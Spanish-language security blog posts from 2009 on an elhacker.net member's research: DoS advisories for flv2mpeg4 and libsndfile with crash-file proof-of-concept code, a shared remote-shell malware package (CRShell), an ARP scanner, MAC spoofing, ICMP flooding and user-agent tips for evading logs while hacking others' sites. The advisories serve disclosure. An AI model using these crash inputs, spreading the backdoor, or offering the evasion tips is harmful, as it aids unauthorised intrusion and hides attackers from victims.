Esto es mas importarte. La mayoría de los software que son públicos tienen un correo/pagina de contacto. Es importante comunicarte con el vendor y darle detalles de la falla que encontraste los pasos que seguiste, y si puedes da sugerencias para mejorar el software.

Arreglado/Corregido

Después de Intercambiar algunos correos y ver que el bug sea arreglado y este disponible un parche o nueva versión ahora si es posible publicar el bug en un blog/web propios y posteriormente publicarlo en alguna pagina como securityfocus, milw0rm entre otras.

Cabe mencionar que muchas veces el bug no sera parcheado o puede tardar mucho.

Formato sugerido para el reporte de bug

Generalmente estos se reportan en texto plano.
La mayoría de lista de correo esperan no mas de 80 caracteres por fila.
Organización y Secciones recomendadas

Limitación
Descripción del Software
Descripción del Problema
Impacto
Solución
Referencias
Créditos

La organización de dichas secciones puede variar y por su puesto que estas se reportan en ingles.

--
- Anon

flv2mpeg4: Malformed parameters Denial of Service

2009-03-08T22:26:00.001-06:00

flv2mpeg4bug.txt.asc

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
 Sun Mar  8 21:06:34 CST 2009        Heuristics and Exploiting Vulnerabilities
                                                                 elhacker.net

Topic: flv2mpeg4: Malformed parameters Denial of Service
 
======================================================================

Table of Contents

1- Affected Software.
2- Background.
3- Problem Description.
4- Severity
5- Solution
6- Time Table
 7- Credits
8- About elhacker.net

======================================================================
1) Affected Software

flv2mpeg4  v1.1

Prior versions may also be affected.
 
======================================================================
2) Background

flv2mpeg4 allows you convert a Flash Video / FLV file (YouTube's videos,etc)
to MPEG4 (AVI/MOV/MP4/MP3/3GP) file online. It is using a compressed domain
 transcoder technology (outline in Japanese). It converts FLV to MPEG4 faster
and less lossy than a typical transcoder.

http://www.freebsd.org/cgi/url.cgi?ports/multimedia/flv2mpeg4/pkg-descr
 
======================================================================
3) Problem Description

As we can see flv2mpeg4 receives 2 parameters the first is expected to be
a flv file and second mpeg4 (AVI/MOV/MP4/MP3/3GP), the problem is a clerical
 error in the parameters or a parameter poorly trained, causing the 
application to stop running unexpectedly

for example:

Anon@localhost % flv2mpeg4 Video.flv Video.mpg
Segmentation fault (core dumped)
 
in this mpg extension is incorrect

Anon@localhost % flv2mpeg4 Video.flv `perl -e '{print "A"x4000,".avi"}'`
Segmentation fault (core dumped)
	
Although the extension is correct in this case, does not allow such a long
 file name

======================================================================
4) Severity

Rating: Very low risk
Impact: Denial of service
Where: Local

======================================================================
 5) Solution

Run flv2mpeg4 done correctly with the parameters in order

======================================================================
6) Time Table

22/12/2008 - Vendor notified.
23/12/2008 - Vendor response.
 08/03/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Anon, elhacker.net

======================================================================
 8) About elhacker.net

Overall objective of the forum elhacker.net
Promote research and encourage the dissemination of knowledge by providing
 a means of information, protecting and fighting for their freedom.

Subforum Heuristics and exploitation of vulnerabilities.
Following the overall objective of the forum, subforum Heuristics and 
exploitation of vulnerabilities (Bugs and Exploits), aims at promoting 
 research into techniques for detection and exploitation of vulnerabilities
in any operating system or program that might allow the execution of 
arbitrary code, or any other means which violate the confidentiality,
 integrity, or availability of information.

http://foro.elhacker.net/
http://foro.elhacker.net/bugs_y_exploits-b32.0/
 
=============================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)

iEYEARECAAYFAkm0mE4ACgkQd963iVkvICn7GQCeIonHNhFV/pdu7uvuZG4ucq+A
 lMEAoIEDL8JsG1mbb2RrAutEN2TaXs/5
=mi4f
-----END PGP SIGNATURE-----
--

- Anon

Mas sobre el User Agent: Idioma-Pais

2009-03-08T17:57:00.001-06:00

Con firefox aunque cambiemos el user agent también es importante cambiar el Idioma-Pais por ejemplo ahorita uno muy comun de firefox:

Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6

Vemos que es-ES se refiere a español españa y hay otros de es-AR de Argentina, que raro no he visto es-MX pero bueno, podriamos porner algo muy lejano de nosotros e incluso inexistene solo para confundir.

Sin embargo hay que tomar en cuenta que si es inexistente se puede llegar a sospechar la falsedad del User-Agent.

He aqui la lista de las Abreviaciones Idioma-Pais que he llegado a capturar:

en-US Estados Unidos
en-GB Gran Bretaña
pt-BR Brazil
es-ES España
es-AR Argentina

¿Algun otro que conoscan? paraa agregar a la lista, de preferencia alguno Ruso, Koreano, Chino, Indio, Afgano, en Fin Asiatico, y Medio Oriente u Norte de Europa.

Saludos
--
- Anon

CRShell Source Code

2009-03-08T17:14:00.001-06:00

Archivo: CRShell Source Code
Password: 3I0VNE0Vcx4

Bueno, en alguna ocasión un compañero lo estaba buscando y no daba con el buscando en google lo encontré junto con un directorio lleno de otros malwares y pues aquí lo tienen.

Dejo a continuación parte de los archivos de Información

CRShell

Programado por XpyXt

URL: http://xpyxt.no-ip.com
URL2: http://xpyxt.no-ip.info/crshell

Mail: xpyxt@desdeinter.net

Informacion del contenido

- Directorio /Cliente Linux
Contiene el codigo fuente del cliente para linux
Para compilar con GCC

- Directorio /Cliente Windows
Contiene el codigo fuente del cliente para Windows
Para compilar con Visual C++ 6.0

- Directorio /Editor Linux
Contiene el codigo fuente del editor para linux
Para compilar con GCC

- Directorio /Editor Windows
Contiene el codigo fuente del editor para Windows
Para compilar con Visual C++ 6.0

- Directorio /Servidor w2k
Contiene el codigo fuente del servidor para Windows 2000
Version del servidor 1.0
Para compilar con Visual C++ 6.0

- Directorio /Servidor w2k w2k3
Contiene el codigo fuente del servidor para Windows 2000 y Windows 2003
Version del servidor 1.1
Para compilar con Visual C++ 6.0

-[ Version 1.1 ]-

Servidor:
+ Funcional con Windows 2003
= Funcional en Windows 2000
= Parametro de ayuda crshell.exe --help
+ Continuas en donde anteriormente te habias quedado en el CMD
- Cada vez que te conectas crea un redireccion del CMD

-[ Version 1.0 ]-

Servidor:
+ Funcional en Windows 2000
+ Parametro de ayuda crshell.exe --help
+ Cada vez que te conectas crea un redireccion del CMD
Cliente:
+ Conexion simple \r\n
Editor
+ Lee el servidor
+ Configura el servidor

Leyenda
+ Funcion nueva
- Funcion quitada
= Funcion en anterior version

1- CRShell es un programa que es distribuido bajo los términos de la Licencia Publica General (GPL)

2- La copia de cualquier parte del código para ponerlo en otro programa diferente, el autor de dicho programa esta acuerdo en que el código completo de su programa pase a ser software libre, por lo debera estar apegado a los terminos establecidos por la licencia GPL.

Es decir que, el código de CRShell solo puede ser tomado si se va a usar en otro proyecto de software libre. De lo contrario absténgase de usar el código.

3- Tu no has programado ni una linea de este código, no te lo apropies, no te adjudiques méritos que no tienes.

Espero y les sirva

Saludos.
--
- Anon

MAC Address Random

2009-03-08T12:21:00.001-06:00

Bueno e aqui un sencillo codogp en C para generar MAC Address Random:

macRandom.c

Código

#include<stdio.h>
 
int main()      {
         unsigned long mac[2];
         register unsigned char *t =(char*) &mac;
         srandomdev();
        mac[0] = random();
         mac[1] = random();
         printf("%x:%x:%x:%x:%x:%x\n",t[0],t[1],t[2],t[3],t[4],t[5]);
         return 0;
}

Después de compilarlo y ejecutarlo:

Código

Anon@localhost# gcc -o macRandom macRandom.c
Anon@localhost# ./macRandom 
 86:1e:cc:23:d4:6

Vemos la salida de las direcciones mac Aleatorias con las cuales podemos configurar nuestra interfaz de red para que cada vez que nos conectemos tengamos una dirección "Física" Diferente.

En mi caso con FreeBSD se realiza así:

Citar

Anon@localhost# ifconfig wpi0 ether `./macRandom `

Donde wpi0 se cambia por la interfaz que sea de tu sistema, y el resultado:

Código

Anon@localhost# ifconfig wpi0
 wpi0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> metric 0 mtu 1500
 	ether 34:5d:e8:74:e9:41
	media: IEEE 802.11 Wireless Ethernet autoselect (autoselect)
 	status: no carrier
	ssid "" channel 1 (2412 Mhz 11b)
 	authmode OPEN privacy OFF txpower 50 bmiss 7 scanvalid 60 bintval 0
 Anon@localhost# ifconfig wpi0 ether `./macRandom `
Anon@localhost# ifconfig wpi0
 wpi0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> metric 0 mtu 1500
 	ether 4c:1e:0f:5e:a6:c2
	media: IEEE 802.11 Wireless Ethernet autoselect (autoselect)
 	status: no carrier
	ssid "" channel 1 (2412 Mhz 11b)
 	authmode OPEN privacy OFF txpower 50 bmiss 7 scanvalid 60 bintval 0

Mirar que cambio la Dirección "Física".

Saludos.

--
- Anon

libnet: Consultas ARP

2009-03-08T10:03:00.001-06:00

Bueno anteriormente en un post Consultas RARP estaba buscando un programa para saber que IP tenia determinada Dirección MAC, ya que dicha dirección la había observado un dia antes y ese dia ya no aparecía en los escaneos de nmap.

Pues buscando no encontré un programa para realizar dicho trabajo después de un tiempo decidí hacer yo mismo dicha aplicación usando libnet, y pues aplicar un poco de fuerza bruta.

Escanee todo el rango de direcciones de la red y logre mi objetivo, sin embargo descubrí que mas de una misma maquina tenia dicha IP todo esto en el mismo Segmento, cosa que podría crear conflictos. Sin embargo después de analizarlo un poco supuse que era para equilibrar la carga de salido o algo así.

El siguiente código escanea un rango especifico de red (Ingresado manualmente) y las respuesta de momento las vemos usando snort o wireshark despues lo reprogramare para usar libpcap y capturar las respuestas

arpscan.c

Código

#include<libnet.h>
#include<stdio.h> 
  
int main(void)  {
         int n;
        u_int8_t c;                                                     //contador
        u_int32_t src_ip;                                               // Para nuestra direccion  IP
         u_int8_t *dts_ip;                                               // Para la direccion IP Destino
         libnet_t *l;                                                    // The libnet context
        libnet_ptag_t t=0,arp = 0;                                      // ptag
         char *device = NULL;                                            //Primera Interfas de Red ~Sup~T que se pueda encontrar
         u_int8_t *packet;                                               //Apuntador al Paquete
        u_int32_t packet_s;                                             //Packet Size
         u_char difucion[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};      //Direccion de Destino "Difusion Ethernet"
         u_char zero[6] = {0x0,0x0,0x0,0x0,0x0,0x0};                     //Direccion Zero
         struct libnet_ether_addr *origen;                               //Nuestra MAC
         char *lib_error = malloc(sizeof(char)*LIBNET_ERRBUF_SIZE);      //Reservamos Memoria para los mensajes de Errores
         dts_ip = (u_int8_t*) malloc(sizeof(u_int8_t)*4);
         dts_ip[0] = 192;
         dts_ip[1] = 168;
         dts_ip[2] = 1;
         l = libnet_init(
                LIBNET_LINK_ADV,                        //injection type
                 device,                                 //network interface
                lib_error);                             //errbuf
  
        if (l == NULL)  {
                 fprintf(stderr, "libnet_init(): %s", lib_error);
                exit(EXIT_FAILURE);
         }
        src_ip = libnet_get_ipaddr4(l);                 //Obtenemos Direccion IP
         origen = libnet_get_hwaddr(l);                  //Obtenetmos Nuestra MAC
         c = 1;
        while(c<255)    {
                 dts_ip[3] = c;
                arp = libnet_build_arp(
                         ARPHRD_ETHER,                   /* hardware addr */
                        ETHERTYPE_IP,                   /* protocol addr */
                         6,                              /* hardware addr size */
                        4,                              /* protocol addr size */
                         ARPOP_REQUEST,                  /* operation type */
                        origen->ether_addr_octet,       /* sender hardware addr */
                         (u_int8_t *)&src_ip,            /* sender protocol addr */
                         zero,                   	/* target hardware addr */
                        dts_ip,                         /* target protocol addr */
                         NULL,                           /* payload */
                        0,                              /* payload size */
                         l,                              /* libnet context */
                        arp) ;                          /* libnet id */
                 if(arp==-1)     {
                         fprintf(stderr,"libnet_build_arp(): %s",libnet_geterror(l));
                         goto bad;
                }
                t = libnet_build_ethernet(
                         difucion,
                        zero,
                        ETHERTYPE_ARP,
                        NULL,
                        0,
                         l,
                        t);
                if(t==-1)       {
                         fprintf(stderr,"libnet_build_ethernet(): %s",libnet_geterror(l));
                         goto bad;
                }
                if(libnet_adv_cull_packet(l,&packet,&packet_s)==-1)     {
                         fprintf(stderr,"libnet_adv_cull_packet(): %s",libnet_geterror(l));
                 }
                else    {
                        fprintf(stderr,"Packet size: %d\n",packet_s);
                         libnet_adv_free_packet(l,packet);
                }
                if((n=libnet_write(l))== -1)    {
                         fprintf(stderr,"Write error: %s\n",libnet_geterror(l));
                         goto bad;
                }
                else    {
                         fprintf(stderr,"Wrote %d bytes ARP packet from context %s check the wire\n",n,libnet_cq_getlabel(l));
                 }
                c++;
        }
        libnet_destroy(l);
         return(EXIT_SUCCESS);
        bad:
         libnet_destroy(l);
        return(EXIT_SUCCESS);
 }

Despues de compilarlo:

Código

Anon@localhost# gcc -Wall `libnet113-config --defines` arpscan.c -o arpscan `libnet113-config --libs` -I /usr/local/include/libnet113/

ejecutamos y vemos que la salida de snort nos devuelve el resultado deceado

Citar

06/11-09:58:29.910702 ARP who-has 192.168.5.1 tell 192.168.5.238
06/11-09:58:29.910914 ARP reply 192.168.5.1 is-at 0:3:47:B0:F9:C1
06/11-09:58:29.910919 ARP reply 192.168.5.1 is-at 0:30:F1:53:91:93
06/11-09:58:29.911008 ARP reply 192.168.5.1 is-at 0:50:FC:B6:F4:26
06/11-09:58:29.911012 ARP reply 192.168.5.1 is-at 0:B:CD:C5:5C:3F
06/11-09:58:29.912326 ARP who-has 192.168.5.2 tell 192.168.5.238
06/11-09:58:29.919400 ARP who-has 192.168.5.3 tell 192.168.5.238
06/11-09:58:29.919442 ARP who-has 192.168.5.4 tell 192.168.5.238
06/11-09:58:29.919471 ARP who-has 192.168.5.5 tell 192.168.5.238
06/11-09:58:29.919499 ARP who-has 192.168.5.6 tell 192.168.5.238
06/11-09:58:29.919528 ARP who-has 192.168.5.7 tell 192.168.5.238
06/11-09:58:29.919557 ARP who-has 192.168.5.8 tell 192.168.5.238
06/11-09:58:29.919585 ARP who-has 192.168.5.9 tell 192.168.5.238
06/11-09:58:29.919614 ARP who-has 192.168.5.10 tell 192.168.5.238
06/11-09:58:29.919642 ARP who-has 192.168.5.11 tell 192.168.5.238
06/11-09:58:29.919670 ARP who-has 192.168.5.12 tell 192.168.5.238
06/11-09:58:29.919751 ARP who-has 192.168.5.13 tell 192.168.5.238
06/11-09:58:29.919762 ARP reply 192.168.5.8 is-at 0:D:61:3F:2D:77
06/11-09:58:29.919843 ARP reply 192.168.5.11 is-at 0:20:ED:1D:89:6B
06/11-09:58:29.919882 ARP who-has 192.168.5.14 tell 192.168.5.238
06/11-09:58:29.919910 ARP who-has 192.168.5.15 tell 192.168.5.238
06/11-09:58:29.920393 ARP reply 192.168.5.14 is-at B6:7C:AE:85:11:0
06/11-09:58:29.927297 ARP who-has 192.168.5.16 tell 192.168.5.238
06/11-09:58:29.932246 ARP who-has 192.168.5.17 tell 192.168.5.238
06/11-09:58:29.951634 ARP who-has 192.168.5.18 tell 192.168.5.238
06/11-09:58:29.952942 ARP who-has 192.168.5.19 tell 192.168.5.238
06/11-09:58:29.953077 ARP reply 192.168.5.19 is-at 0:11:85:AE:8C:D

En mi caso esa ocacion ecnontre dicha mac y si era la IP que el dia anterior, pero como mencione decubri que existian 4 Direcciones MAC con la misma Direccion IP

Citar

Como los equipos siempre responden a ARP, se puede considerar como una petición mucho mejor que el ICMP ya que en ocasiones este es bloqueado por "seguridad"
Con lo cual se me ocurrieron muchas ideas, sin embargo eso eso otro tema.

Saludos.
--
- Anon

Herramienta (jpgtn): Crear Thumbnails de Imagenes JPEG

2009-03-07T20:12:00.001-06:00

Bueno una excelente herramienta herramienta que existe para crear imagnes Thumbnails apartir de los archivos Originales de una menera automatica es la herramienta jpgtn con ella podremos generar Thumbnails de todo un subdiretorio por ejemplo:

codigo:
Anon@localhost % jpgtn -p "tn_" -d "tn/" *.jpg

Segun vemos algunos ejemplos en la pagina man de la utilidad:

EXAMPLES
       To create thumbnails of all the '.jpg' files in the current directory
       and output them to the current directory with the default prefix "tn_"
       use:

       $ jpgtn *.jpg

       To do the same thing as above, but to put the thumbnails in './thumbs'
       use:

       $ jpgtn -d "./thumbs/" -p "tn_" *.jpg

Esto es perfecto para generar vistas en miniatura de wallpapers y algunas otroas imagenes que queramos.

Saludos.

--
- Anon

Comparar archivos en windows

2009-03-06T14:08:00.001-06:00

Bueno después de buscar alternativas para la comparación de archivos en windows encontré windiff y fc:

el primero es visual, y el según es mas al estilo de diff pero con el formato de windows

esto es una soluciona a: "comp" en WIndows una verdadera porqueria

Al principio pensé que comp era la utilidad de windows para hacerlo, pero después me dijieron que no que lo era fc y pues veo que ese si funciona.

Windiff:

fc:

con esto ya soluciono el asunto de comparar archivos en windows.

Saludos.

--
- Anon

"comp" en WIndows una verdadera porqueria

2009-03-05T08:54:00.001-06:00

Pues trataba yo de comprar los archivos con la falla CVE-2009-0186 para ver cuales era las diferencias y como mi laptop esta descompuesta no tengo en este momento a FreeBSD, tratando de hacerlo en windows vi que existia la utilidad comp trate de usarlo y me decepciono.

Ayuda de comp

Citar

C:\Users\Anon>help comp
Compara el contenido de dos archivos o conjuntos de archivos.

COMP [datos1] [datos2] [/D] [/A] [/L] [/N=número] [/C] [/OFF[liNE]]

datos1 Especifica la ubicación y los nombres de los primeros archivos
que se van a comparar.
datos2 Especifica la ubicación y los nombres de los segundos archivos
que se van a comparar.
/D Muestra las diferencias en formato decimal. Esta es la
configuración predeterminada.
/A Muestra las diferencias en caracteres ASCII.
/L Muestra los números de línea para las diferencias.
/N=número Compara sólo el número de líneas especificado de cada archivo.
/C Omite las mayúsculas/minúsculas de ASCII al comparar archivos.
/OFF[liNE] No omite archivos con el atributo "sin conexión" establecido.

Para comparar conjuntos de archivos, use comodines en datos1 y datos2.

Prueba de compracion

Código:

C:\Users\Anon>comp libsndfile-1.0.18\src\caf.c libsndfile-1.0.19\src\caf.c /C /L /A
Comparando libsndfile-1.0.18\src\caf.c y libsndfile-1.0.19\src\caf.c...
 Los archivos tienen tamaños diferentes.

¿Desea comparar más archivos (S/N) ? N

C:\Users\Anon>

mmm

Citar

Comparando libsndfile-1.0.18\src\caf.c y libsndfile-1.0.19\src\caf.c...
Los archivos tienen tamaños diferentes.

Que mierda de utilidad tendre que buscar un diff para windows o algun gestor visual de diferencias entre archivos.

Saludos

--
- Anon

libsndfile 1.0.18 CAF Processing Integer Overflow Vulnerability

2009-03-04T17:41:00.001-06:00

Previamente en Winamp <= 5.541, libsndfile <= 1.0.17 AIFF buffer unverified se corrigio una falla en la libreria y ahora sale nuevamente otra version.

Pues no acabando con las fallas en libsndfile (Usada por xmms, winamp y algunos otros reproductores).
Recientemente el 7 de febrero se habia parcheado una vulnerabilidad y ahora hace unos 2 dias sale a la luz una nueva versión de dicha libreria:

Código:

# Version 1.0.18 (Feb 07 2009) Add Ogg/Vorbis suppport, remove captive libraries, many new features and bug fixes. Generate Win32 and Win64 pre-compiled binaries.
 # Version 1.0.19 (Mar 02 2009) Fix for CVE-2009-0186. Huge number of minor fixes as a result of static analysis.

http://www.mega-nerd.com/libsndfile/

No se si alguna version de winamp hubiese salido entre las dos fechas anteriores sin embargo y si salio cargada con la nueva libreria tambien es vulnerable.
Y segun la pagina si podriamos ejecutar codigo con la falla

El bug al parecer si se puede aprovechar de manera remota secunia ha reportado esto y tiene ya su CVE-2009-0186 lo interesante seria buscar un PoC y modificarlo para ejecutar comandos de manera remota, estare investigando los cambios en el codigo fuente de ambas versiones vere sobre la falla.

Saludos

--
- Anon

libsndfile AIFF buffer unverified

2009-02-14T09:13:00.002-06:00

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

libsndfile AIFF buffer unverified

A security issue affects the following library/software releases

libsndfile <= 1.0.17
xmms-sndfile <= 1.2_4
winamp <=  5.541

And possibly more

- -BACKGROUND

Libsndfile is a C library for reading and writing files containing sampled
sound (such as MS Windows WAV and the Apple/SGI AIFF format) through one
standard library interface.

- -DESCRIPTION
 
Testing and debugging winamp, I have verified that the bug is specific to
the library libsndfile. I saw that some of the functions of reading gives
AIFF file headers, this does not check the limits of (CommonChunk.ckSize).
There may be other functions with the same problem. One of the errors
occur when unverified memset is called the limit of memory.

Quote segment code at src/aiff.c: 847
============================================================
      else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
       {
 //Some lines omitted

 memset (psf-> u.scbuf, 0, comm_fmt-> size);
============================================================

- -CODE

============================================================
#include<stdio.h>
#include<stdlib.h>

#define AIFFSIZE 81
char *aiffbuff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";

int main(void)  {
       FILE *aiff = fopen("evil.aiff","w+");
       fwrite(aiffbuff,AIFFSIZE,1,aiff);
       fclose(aiff);
}

============================================================

At the time that these applications process the file with invalid headers,
stop for an unexpected error, tcsh sample:

============================================================

Anon@localhost % xmms -v
xmms 1.2.11
Anon@localhost % xmms -p evil.aiff

Segmentation fault

You've probably found a bug in XMMS, please visit
http://bugs.xmms.org and fill out a bug report.

============================================================

- -IMPACT

Just a fun, but without using Denial of Service to any programs
that run the library.

Att.

Anon[at]elhacker.net


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)

iQCVAwUBSZbcxT0RloP1tHX9AQIfTQP/aqqzwsVwQow4U4D1lzM0CYIVymjYmL7+
k1qmq4cypYyaSCYUt9KXBIh52hWYFtFfMlrYnREgbf+zDIgme6syUkU7EfE567ah
1tXhjJdYlC3CrKc6t2psUqyuhHBDU8YVyLyuTvTvWykQjVRKJUlfvNEeB97CVvHe
rrl8KwnEItk=
=FNmo
-----END PGP SIGNATURE-----

Otro User Agent para usar.

2009-02-14T07:41:00.001-06:00

Como recordaran en un post anterior: ¿Que User-Agent usar? Para no sobresalir en los Logs

Ahi vimos que uno de los user agent mas comunes es del IE 6 Bajo Windows 5.1 (Generalmente windows XP).

con el siguiente User-Agent: Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)

Posiblemente sea por qu muchos usan Copias Piratas de Windows y no pueden actualizarse a IE 7 pero bueno eso fue otro tema.

Usando Firefox el mas comun es: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5

Sin embargo esto cambiaria rapidamente con las actualizacaciones automaticas de FIrefox, cambiaria a la 3.0.6 y tal vez la version de Gecko.

Saludos.

¿Que User-Agent usar? Para no sobresalir en los Logs

2009-01-22T21:23:00.002-06:00

El hecho de revelar o no el navegador que usamos, muchas veces es contradictorio, si nos ponemos paranoicos ¿que resulta mejor? mandar el header del navegador (User-Agent) o no ? y si lo mandamos la referencia cual mandamos? obvio no puede ser el de nosotros en caso de que usemos algún navegador "raro", sin embargo si usamos Windows y IE, pues podemos estar seguros.

Ahora digamos que nuestros propósito es realizar "un poco de hacking" en sitios que no son nuestros, obvio no lo vamos a hacer desde nuestra IP una vez solucionado la navegación anónima, nos queda que debemos de explorar la pagina con un navegador y nuestro explorador tiene que mandar un User-Agent o no segun queramos, Tenemos entonces la decicion de cual mandar

IE, es el mas común y si no queremos sobresalir tenemos que estar confundidos entre la multitud

Código:

 Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)

Anteriormente he visto quienes se jactan de decir "Yo he configurado mi firefox para que en el User-Agent mande (Script kiddie was here)" y pues se trata de no llamar la atención y ser mas discreto (confundirse
entre la multitud)
Saludos

Como medir el Ancho de Banda entre hosts mediante ICMP

2009-01-20T12:58:00.001-06:00

Solo es un promedio y es un aproximado (No es preciso)

Por ejemplo, Conexión Directa de mi laptop a una PC de escritorio, ambos con una tarjeta 100 Base T.

Después de un:

Código

Anon@localhost % man ping

Tenemos que con:

Código

ping -c 100 -s 10232 192.168.0.1

Código

Anon@localhost # ping -c 100 -s 10232 192.168.0.1
PING 192.168.0.1 (192.168.0.1): 10232 data bytes
10240 bytes from 192.168.0.1: icmp_seq=99 ttl=128 time=2.263 ms
#Muchas Respuestas Omitidas...
--- 192.168.0.1 ping statistics ---
100 packets transmitted, 100 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 2.134/2.261/2.437/0.042 ms

Nota que la maquina tardo en responderme bastante tiempo bueno, eso pienso yo (Creo que por que la PC de Escritorio es WIndows Vista)

Igual no ocupábamos tantos paquetes con unos cuantos hubiese bastado, puse muchos para sacar un promedio.

Citar

100 packets transmitted, 100 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 2.134/2.261/2.437/0.042 ms

Entonces mandamos en el paquete IP 8 Bytes de ICMP-Header y 10232 de Datos, lo cual suma mas mas o menos 10240 + unos bytes adicionales del IP-Header + el Ethernet-Header, Para efectos de demostración lo dejaremos en 10240 o mas breve mente 10KB.

un Segundo Tiene 1000 mili segundos, si el tiempo de ida y vuelta promedio fue de 2.261 ms supongo que solo le tomo 1.1305 ms de ida.

Entonces tenemos que en 1 segundo puedo mandar 10KB o mas, unas 884.5 veces esa cantidad de información. Teóricamente son cerca de ~9057280 Bytes lo que se resume como 8845KB o ~8.65 MB que son cerca de 100 Mb que dan las tarjetas de red, me imagino que lo que hace falta para por que si Transformamos 100 Mb a MB tenemos que deberían de ser 12.5 MB lo cual es el máximo Teórico.

Ahora probamos el tiempo mínimo de ida y vuelta.

2.134 ms
1.067 ms de solo enviarlos
En 1 Segundos podremos mandar 937.2 veces esa información lo que da un total de ~95970001 Bytes o 9372 KB o 9.15 MB .

Ahora en mi sistema puedo mandar un icmp flood con la opción -f de ping

Código

Anon@localhost # ping -f -s 20480 192.168.0.1
PING 192.168.0.1 (192.168.0.1): 20480 data bytes
..^C.
--- 192.168.0.1 ping statistics ---
19155 packets transmitted, 19153 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 3.736/3.999/10.512/0.142 ms

Citar

ping -f -s 20480 192.168.0.1

Citar

19155 packets transmitted, 19153 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 3.736/3.999/10.512/0.142 ms

Solo perdimos 2 Paquetes en esta ocasión de 20KB

3.736 / 2 = 1.868
En 1 Segundo 535 con lo que tenemos 10963597 Bytes o 10706 KB o10.45 MB lo cual es mas aproximado a los 12.5 MB/s Teóricos.

Posible error en inet_ntoa()

2009-01-11T00:06:00.001-06:00

Practicando un poco sobre raw sockets y demás, he visto que en existe un error muy curioso en la función inet_ntoa() que es estandar dentro de libc.

Todo surgio a raiz de https://foro.elhacker.net/programacion_cc/pequeno_sniffer_en_c-t235639.0.html;msg1156524#msg1156524

No se si sea igual el codigo en linux, pero este ultimo al igual que freebsd tambien tiene la falla.

El codigo de inet_ntoa es el siguiente:

inet_ntoa(struct in_addr in) {
         static char ret[18];
  
        strcpy(ret, "[inet_ntoa error]");
        (void) inet_ntop(AF_INET, &in, ret, sizeof ret);
         return (ret);
}

 inet_ntoa Manda llamar inet_ntop y esta a su vez a inet_ntop4

const char *
 inet_ntop(int af, const void * __restrict src, char * __restrict dst,
     socklen_t size)
{
        switch (af) {
         case AF_INET:
                return (inet_ntop4(src, dst, size));
         case AF_INET6:
                return (inet_ntop6(src, dst, size));
         default:
                errno = EAFNOSUPPORT;
                return (NULL);
         }
        /* NOTREACHED */
}
 
 
static const char *
 inet_ntop4(const u_char *src, char *dst, socklen_t size)
 {
        static const char fmt[] = "%u.%u.%u.%u";
         char tmp[sizeof "255.255.255.255"];
         int l;
 
        l = snprintf(tmp, sizeof(tmp), fmt, src[0], src[1], src[2], src[3]);
         if (l <= 0 || (socklen_t) l >= size) {
                 errno = ENOSPC;
                return (NULL);
         }
        strlcpy(dst, tmp, size);
        return (dst);
 }

El problema creo yo que a la hora de poner esto en una direccion statica, al mandarlo a llamar 2 veces durante el mismo printf(), hace guarde en la pila 2 veces la misma direccion:

# gdb ./sniffer
GNU gdb 6.1.1 [FreeBSD]
 
(gdb) break 49
 
Breakpoint 1 at 0x8048309: file sniffer.c, line 49.
(gdb) run
 
Starting program: /usr/home/Anon/sniffer 
 
Esperando paquetes...
 
Breakpoint 1, main () at sniffer.c:49
 
49						printf("[+] ICMP: %s\t->\t%s\n",inet_ntoa(iphead->ip_src),inet_ntoa(iphead->ip_dst));
 
(gdb) printf "0x%x\n", buff
 
0x28102000
(gdb) i r
 
eax            0x1	1
ecx            0xbfbfec98	-1077941096
edx            0x0	0
ebx            0x1	1
 
esp            0xbfbfecb0	0xbfbfecb0
ebp            0xbfbfecf8	0xbfbfecf8
esi            0xbfbfed40	-1077940928
edi            0x0	0
 
eip            0x8048309	0x8048309
eflags         0x246	582
cs             0x33	51
ss             0x3b	59
 
ds             0x3b	59
es             0x3b	59
fs             0x3b	59
gs             0x1b	27
 
(gdb) x/4 0xbfbfecb0
 
0xbfbfecb0:	0x00000003	0x28102000	0x00010000	0x00000000
(gdb) step          
 
[+] ICMP: 74.125.95.147	->	74.125.95.147
 
52					break;
(gdb) x/4 0xbfbfecb0
 
0xbfbfecb0:	0x08062664	0x08066e98	0x08066e98	0x00000000
(gdb) printf "%s\n", 0x08062664
 
[+] ICMP: %s	->	%s
 
 
(gdb) printf "%s\n", 0x08066e98
 
74.125.95.147
(gdb) x/4 0xbfbfecb0
 
0xbfbfecb0:	0x08062664	0x08066e98	0x08066e98	0x00000000
 # gdb ./sniffer
GNU gdb 6.1.1 [FreeBSD]
 
(gdb) break 49
 
Breakpoint 1 at 0x8048309: file sniffer.c, line 49.
(gdb) run
 
Starting program: /usr/home/Anon/sniffer 
 
Esperando paquetes...
 
Breakpoint 1, main () at sniffer.c:49
 
49						printf("[+] ICMP: %s\t->\t%s\n",inet_ntoa(iphead->ip_src),inet_ntoa(iphead->ip_dst));
 
(gdb) printf "0x%x\n", buff
 
0x28102000
(gdb) i r
 
eax            0x1	1
ecx            0xbfbfec98	-1077941096
edx            0x0	0
ebx            0x1	1
 
esp            0xbfbfecb0	0xbfbfecb0
ebp            0xbfbfecf8	0xbfbfecf8
